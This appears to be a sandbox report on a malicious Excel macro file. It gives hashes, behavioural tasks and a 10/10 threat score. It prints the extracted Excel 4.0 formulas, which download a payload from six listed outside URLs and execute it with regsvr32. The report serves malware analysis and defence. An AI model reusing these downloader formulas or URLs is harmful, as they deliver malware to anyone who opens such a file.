General
-
Target
3439367f3e0e4abd2579d16bbd004426a2df77da96b2b40bfe1b8497e4da258b
-
Size
29KB
-
Sample
241111-w4lq3atcmn
-
MD5
83a9d33633b5d860d1f23980d432c773
-
SHA1
707ecacd3604c35017a2daa8961301a653e6187f
-
SHA256
3439367f3e0e4abd2579d16bbd004426a2df77da96b2b40bfe1b8497e4da258b
-
SHA512
84c8747f8d8f728ba2a50e1ab4efb0204d766c8cfca219fb8576241c107c7250cda3cd775309193c3854dd2f10d8d64a71e6e03fa1f6c5b77275f5629eda3cdf
-
SSDEEP
384:VDr77gLEQgRL2sOr1U6ZlEnBcvgSTxxZkN6L+tjU5qhd8VqBHO8D9JJJ4IVwb:JPELA2s61VECvgOZS4+NcDVOXD9F4IG
Behavioral task
behavioral1
Sample
3439367f3e0e4abd2579d16bbd004426a2df77da96b2b40bfe1b8497e4da258b.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
3439367f3e0e4abd2579d16bbd004426a2df77da96b2b40bfe1b8497e4da258b.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
http://janshabd.com/E33ZFv/
http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/
http://vulkanvegasbonus.jeunete.com/wp-content/hAAFJQA1Bm/
http://www.aacitygroup.com/mordacity/g29PQhuYA5x/
http://actividades.laforetlanguages.com/wp-admin/uKLMwQwwo0W/
https://sse-studio.com/cq0xhpj/wdktmllfAYV/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://janshabd.com/E33ZFv/","..\dw.ocx",0,0) =IF('OFJOV'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/","..\dw.ocx",0,0)) =IF('OFJOV'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vulkanvegasbonus.jeunete.com/wp-content/hAAFJQA1Bm/","..\dw.ocx",0,0)) =IF('OFJOV'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.aacitygroup.com/mordacity/g29PQhuYA5x/","..\dw.ocx",0,0)) =IF('OFJOV'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://actividades.laforetlanguages.com/wp-admin/uKLMwQwwo0W/","..\dw.ocx",0,0)) =IF('OFJOV'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://sse-studio.com/cq0xhpj/wdktmllfAYV/","..\dw.ocx",0,0)) =IF('OFJOV'!D21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\dw.ocx") =RETURN()
Extracted
http://janshabd.com/E33ZFv/
http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/
Targets
-
-
Target
3439367f3e0e4abd2579d16bbd004426a2df77da96b2b40bfe1b8497e4da258b
-
Size
29KB
-
MD5
83a9d33633b5d860d1f23980d432c773
-
SHA1
707ecacd3604c35017a2daa8961301a653e6187f
-
SHA256
3439367f3e0e4abd2579d16bbd004426a2df77da96b2b40bfe1b8497e4da258b
-
SHA512
84c8747f8d8f728ba2a50e1ab4efb0204d766c8cfca219fb8576241c107c7250cda3cd775309193c3854dd2f10d8d64a71e6e03fa1f6c5b77275f5629eda3cdf
-
SSDEEP
384:VDr77gLEQgRL2sOr1U6ZlEnBcvgSTxxZkN6L+tjU5qhd8VqBHO8D9JJJ4IVwb:JPELA2s61VECvgOZS4+NcDVOXD9F4IG
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-